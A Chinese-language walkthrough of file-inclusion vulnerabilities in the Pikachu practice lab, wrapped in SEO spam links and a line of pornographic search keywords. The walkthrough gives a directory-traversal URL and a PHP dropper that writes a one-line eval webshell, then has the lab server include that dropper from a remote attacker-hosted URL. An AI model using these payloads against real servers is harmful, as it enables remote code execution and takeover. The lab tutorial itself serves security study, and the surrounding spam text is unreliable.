国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當前位置: 首頁 > news >正文

wordpress 融資谷歌seo網絡公司

news 2025/7/6 22:43:08
wordpress 融資,谷歌seo網絡公司,網站建設技術員保密協(xié)議,安 網站建設文章目錄 1、文件包含漏洞概述1.1 文件包含漏洞1.2 相關函數1.3 文件包含漏洞分類 2、File Inclusion(local)3、File Inclusion(remote) 1、文件包含漏洞概述 1.1 文件包含漏洞 文件包含漏洞:在web后臺開發(fā)中,程序員往往為了提高效率以及讓代碼看起來更…

文章目錄

  • 1、文件包含漏洞概述
    • 1.1 文件包含漏洞
    • 1.2 相關函數
    • 1.3 文件包含漏洞分類
  • 2、File Inclusion(local)
  • 3、File Inclusion(remote)

1、文件包含漏洞概述

1.1 文件包含漏洞

??文件包含漏洞:在web后臺開發(fā)中,程序員往往為了提高效率以及讓代碼看起來更簡潔,會使用“包含”函數功能。比如把一系列功能函數都寫進function.php中,之后當某個文件需要調用的時候就直接在文件頭中寫上一句<?php include function.php?>就可以調用函數代碼。但有些時候,因為網站功能需求,會讓前端用戶選擇需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于開發(fā)人員沒有對要包含的這個文件進行安全考慮,就導致攻擊者可以通過修改包含文件的位置來讓后臺執(zhí)行任意文件(代碼)。

??需要注意的是,php的文件包含不管文件后綴名是什么,只要包含php代碼,就可以被當作php代碼解析。

1.2 相關函數

??文件包含包含函數:在php中,通過include()、include_once()require()、require_once()語句,可以將php文件的內容插入另一個php文件(在服務器執(zhí)行它之前)。include()include_once()的區(qū)別在于include_once()只能包含一次相同的文件。

??includerequire函數在錯誤處理方面有所不同:

  • require會生成致命錯誤(E_COMPILE_ERROR)并停止腳本;
  • include只生成警告(E_WARNING),并且腳本會繼續(xù)。

1.3 文件包含漏洞分類

??根據不同的配置環(huán)境,文件包含漏洞分為本地文件包含漏洞遠程文件包含漏洞
(1)本地文件包含漏洞
??僅能夠對服務器本地的文件進行包含,由于服務器上的文件并不是攻擊者所能夠控制的,因此該情況下,攻擊著更多的會包含一些固定的系統(tǒng)配置文件,從而讀取系統(tǒng)敏感信息。
(2)遠程文件包含漏洞
??能夠通過url地址對遠程的文件進行包含,這意味著攻擊者可以傳入任意的代碼。

??此處的本地指的是服務器端,遠程指的是非服務器端。

2、File Inclusion(local)

(1)在搜索框中選擇kobe之后1,url變?yōu)?#xff1a;http://192.168.92.1:32769/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4
在這里插入圖片描述

??觀察到url中出現filename=file1.php,那么該目錄下是否存在fileX.php文件呢?

(2)發(fā)現隱藏文件,對文件名進行爆破,可以發(fā)現file6、file7、file8、file9、file10、file100返回異常。說明存在隱藏文件。
在這里插入圖片描述

(3)讀取不同文件夾的文件

??filename=file9.php返回了報錯,通過這個報錯,可以知道fi_local.php中用來進行文件包含的函數是include(),并且包含的文件路徑為與fi_local.php同文件夾下include文件夾中的文件。
在這里插入圖片描述

??payload:http://192.168.92.1:32769/vul/fileinclude/fi_local.php?filename=/../../&submit=%E6%8F%90%E4%BA%A4,可以發(fā)現現在include函數中的相對路徑已經跳轉到了/app/vul路徑下了。也就是說只要我們知道某個文件的相對位置,就可以訪問它。

在這里插入圖片描述

3、File Inclusion(remote)

(1)遠程文件包含這里,同樣是通過傳遞一個文件名進行包含。
在這里插入圖片描述
(2)filename改為www.baidu.com后,會直接訪問百度;
在這里插入圖片描述
(3)在 Kali 上,在 /var/www/html/ 中新建一個shell.txt,輸入下面的內容:

<?php
$myfile = fopen("shell.php", "w");
$txt = '<?php @eval($_POST[cmd]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>

??同時,使用service apache2 start開始apache服務,構造payload:
http://192.168.92.1/vul/fileinclude/fi_remote.php?filename=http://192.168.92.1/shell.txt&submit=提交

在這里插入圖片描述

??貌似什么也沒發(fā)生,我們需要訪問生成的shell.php文件就可以拿到webshell了。

(4)連接webshell
在這里插入圖片描述

??另外,遠程包含漏洞前提:如果使用 includer 和 require ,則需要 php.ini 配置如下:

allow_url_fopen = on;(默認開)
allow_url_include = on;(默認關)
http://m.aloenet.com.cn/news/869.html

相關文章:

  • 貴陽網站建設服務公司網站注冊查詢
  • 新手網站百度seo規(guī)則
  • 小程序開發(fā)平臺哪家產品較好汕頭seo快速排名
  • 有沒有專門做設計的網站外貿seo建站
  • 伍佰億網站怎么做2020年可用好用的搜索引擎
  • 圖躍網站建設國外網站開發(fā)
  • seo網站推廣優(yōu)化站長工具綜合查詢官網
  • 網站建設公司怎么賺錢網絡宣傳推廣
  • php與dw怎么做校園網站seo教程
  • 備案期間怎么做網站十大搜索引擎
  • 寧波網站建設 熊掌號服務營銷策略
  • be設計網站自己開發(fā)網站
  • 時尚字體設計網站網絡營銷推廣的方式
  • 樂清網站建設公司網絡軟文營銷案例3篇
  • 免費網站建設加盟亞洲衛(wèi)星電視網參數表
  • 網站建設 中企動力公司搭建網站的步驟和順序
  • 網站app開發(fā)平臺百度非企渠道開戶
  • 孝感網站開發(fā)的公司電話集客營銷軟件
  • 攀枝花建設工程有限責任公司網站一元友情鏈接平臺
  • 池州專業(yè)網站建設谷歌搜索引擎鏡像
  • 網站設計 電子購物網站設計網絡精準推廣
  • 電商網站建設推廣企業(yè)網絡規(guī)劃設計方案
  • 網站建設的結論和體會百度推廣營銷中心
  • 柳州正規(guī)網站制作公司發(fā)稿網
  • 牛街網站建設免費網站推廣軟件哪個好
  • 電子書籍網站開發(fā)推廣鏈接點擊器網頁
  • 如何開一個微信公眾號seo顧問合同
  • 昆明企業(yè)自助建站系統(tǒng)百度官網客服
  • 曹縣網站開發(fā)抓取關鍵詞的軟件
  • 虛擬幣挖礦網站開發(fā)新鄉(xiāng)seo網絡推廣費用